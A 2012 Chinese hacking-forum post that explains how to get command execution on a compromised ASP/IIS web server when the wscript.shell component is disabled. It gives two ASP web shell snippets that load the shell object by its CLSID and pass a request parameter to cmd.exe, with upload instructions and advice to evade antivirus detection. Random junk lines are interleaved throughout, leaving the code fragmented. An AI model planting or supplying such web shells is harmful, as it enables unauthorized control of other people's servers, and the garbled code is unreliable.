中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
4 ]+ f9 W* M9 q$ U# k. H
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
) b% |0 ?; ]: g4 l) g
要想让运行命令可以试试这种方法,成功率为五五之数。
- p4 q, _) Z2 [$ h# N
把下面代码复制:
, G+ v/ ]! z4 i0 U5 k
<%
! o% t% z" Z& z5 } K$ K
end if
9 a2 D7 A5 t9 g6 G' N
response.write(”")
( j/ K" b$ z; A/ Q2 w" G
On Error Resume
7 i" _3 D/ }! N1 L; ~# x) o
Next
8 v. y5 d- i D- p! g. L+ i
response.write oScriptlhn.exec(”cmd.exe /c” &
* [& E3 }$ Y. ^9 q# }6 }
request(”c”)).stdout.readall
. k4 S9 ^7 b g
response.write(”")
6 L8 h$ E6 B3 {6 u' J7 o" F9 Y
response.write(”")
. @! A P+ @ w9 t, j
response.write(”
$ V6 I) S! ]) ~9 T
“)
O7 ]3 V0 j8 m/ m) \
response.write(”")
* s. @6 \! q: k# m
%>
4 ?# R5 x4 B& [8 L
保存为一个asp文件,然后传到网站目录上去
% h3 m2 o6 e& U1 @. N3 L* s) L0 J9 x
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
5 K6 D. d2 r' f
我用此成功运行过cacls命令。
! u: _5 e# [/ ]. n; C3 p
第二那就是运行时出错,可能限制某些代码执行
4 w7 n5 d: n/ u a7 t3 j
无wscript.shell组件提权又一个方法
& q0 [0 z0 Y/ T, h
<object runat=server id=oScriptlhn scope=page
& R( u+ ^- c; Y% l+ u8 o7 [
* ^! |" N* @! ?7 w. |+ w7 o5 R: S
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
3 @2 D0 e% Q9 v
<%if err then%>
/ k3 \& i6 n, A; ]* t% ^
<object runat=server id=oScriptlhn scope=page
6 k% q$ a+ L- g* a
, w& d$ G8 b+ e# w; A
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
. X: \5 X; ^# M+ j. v1 c
<%
A" \: h$ d, f! O
end if
- b0 U2 }( N# s. m' L0 t" C
response.write(”<textarea readonly cols=80
$ |/ o# ^) a2 H/ w7 a
% |9 w Y$ s; z
rows=20>”)
8 a. y6 h) F! C1 I( b
On Error Resume Next
9 O% a$ `$ P5 e' K/ v: X
response.write
! h [# k' m T5 u
/ `* r/ ^3 r t' K
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
/ I0 s* ^$ R! k7 ]- Q
response.write(”</textarea>”)
( L, u) B" B: ]# t5 ~
response.write(”<form
- h1 y n1 K; [4 c' }: V- r
! ]$ |& }3 o- S& b/ W; D, [8 {
method=’post’>”)
, u$ d* }- Q" H7 p8 l
response.write(”<input type=text name=’c'
: s* ?" ^1 ]4 _, J! f2 t- v
( ?2 j b6 F3 }! D. D) C$ L
size=60><br>”)
; K9 @1 U7 J+ r M! r8 E( ~& ]2 J/ f
response.write(”<input type=submit
, }3 ?7 L1 Y0 @0 i$ g
, z# P/ r: ]2 U/ ~: F
value=’执行’></form>”)
' r2 g; P8 n+ N9 Q0 n
%>
% |/ ^( R2 d, Q1 y+ S
保存为ASP,此代码可能被杀,请注意免杀。
; T" a# F0 M; A4 Y$ [7 ]1 f# ^
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
9 m' O" W9 j9 X
复制代码
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2